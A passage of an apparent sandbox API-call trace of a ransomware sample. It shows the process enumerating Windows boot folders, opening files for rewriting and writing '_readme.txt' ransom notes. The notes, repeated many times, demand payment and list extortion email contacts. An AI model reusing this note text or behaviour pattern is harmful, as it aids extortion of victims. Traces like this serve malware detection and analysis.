us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" [0188.418] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd", lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" [0188.418] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e77f68 [0188.418] CreateFileW (lpFileName="C:\\Boot\\nl-NL\\_readme.txt" (normalized: "c:\\boot\\nl-nl\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0188.418] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e77f68 | out: hHeap=0x620000) returned 1 [0188.419] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a68 | out: hHeap=0x620000) returned 1 [0188.419] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.419] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.419] FindFirstFileW (in: lpFileName="C:\\Boot\\nl-NL\\*" (normalized: "c:\\boot\\nl-nl\\*"), lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956d02a0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28daa640, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28daa640, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cfe100 [0188.420] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.420] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956d02a0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28daa640, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28daa640, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0188.420] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956d02a0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28daa640, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe84c457e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0188.420] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.420] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd80 [0188.420] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.420] PathFindExtensionW (pszPath="C:\\Boot\\nl-NL\\bootmgr.exe.mui") returned=".mui" [0188.420] CreateFileW (lpFileName="C:\\Boot\\nl-NL\\bootmgr.exe.mui" (normalized: "c:\\boot\\nl-nl\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0188.421] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd80 | out: hHeap=0x620000) returned 1 [0188.421] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956d02a0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28daa640, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe84c457e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0188.421] FindClose (in: hFindFile=0x2cfe100 | out: hFindFile=0x2cfe100) returned 1 [0188.421] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.421] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fe8 | out: hHeap=0x620000) returned 1 [0188.421] PeekMessageW (in: lpMsg=0x312ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312ff08) returned 0 [0188.421] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fe8 [0188.421] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0188.421] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.421] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0188.422] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.422] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.422] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.422] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0188.422] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.422] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.422] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.422] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0188.423] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.423] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.423] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.423] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0188.423] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.423] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.423] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.423] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0188.424] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.424] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.424] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.424] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e776e0 [0188.424] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.425] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.425] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.425] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0188.425] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x2e902a8 [0188.425] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.425] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0188.426] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.426] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.426] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0188.426] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.426] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.426] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.426] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e776e0 [0188.427] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.427] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.427] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.427] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e776e0 [0188.427] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.428] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.428] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.428] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e776e0 [0188.428] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.428] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.428] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.428] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0188.429] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.429] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.429] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.429] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0188.429] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.430] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.430] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.430] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e776e0 [0188.430] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.430] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.431] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.431] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e776e0 [0188.431] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.431] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.431] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.431] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0188.432] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.432] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.432] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.432] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0188.432] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.433] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.433] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.433] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0188.433] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.434] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.434] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.434] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0188.434] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.434] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.435] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.435] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0188.435] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.435] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.435] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.435] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0188.436] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.436] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.436] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.436] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0188.436] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.437] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.437] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.437] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0188.437] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0188.437] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.438] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0188.438] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.438] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.438] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0188.438] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.439] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.439] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.439] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0188.439] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x2e902a8 [0188.439] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.439] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0188.440] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.440] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.440] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e776e0 [0188.440] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.440] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.440] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.441] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e776e0 [0188.441] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.441] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.441] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.441] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0188.442] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.442] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.442] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.442] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0188.442] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.442] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.442] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.443] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0188.443] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0188.443] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.443] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0188.444] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.444] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.444] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e776e0 [0188.444] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.444] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.444] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.444] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e776e0 [0188.444] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.445] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.445] PathFindFileNameW (pszPath="C:\\Boot\\pl-PL\\") returned="pl-PL\\" [0188.445] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0188.445] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83f98 | out: hHeap=0x620000) returned 1 [0188.445] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0188.445] PathFindFileNameW (pszPath="") returned="" [0188.446] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x74ff0000 [0188.446] GetProcAddress (hModule=0x74ff0000, lpProcName="SHGetFolderPathW") returned 0x75075708 [0188.446] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x2e902a8 | out: pszPath="C:\\Users\\kEecfMwgj") returned 0x0 [0188.446] FreeLibrary (hLibModule=0x74ff0000) returned 1 [0188.446] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.446] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0188.447] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.447] PathAppendW (in: pszPath="C:\\Boot\\pl-PL\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\pl-PL\\_readme.txt") returned 1 [0188.447] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0188.447] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.447] PathFileExistsW (pszPath="C:\\Boot\\pl-PL\\_readme.txt") returned 0 [0188.447] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d00) returned 0x2e96a68 [0188.447] lstrcpyW (in: lpString1=0x2e96a68, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd") returned="ATTENTION!\r\n\r\nDon't 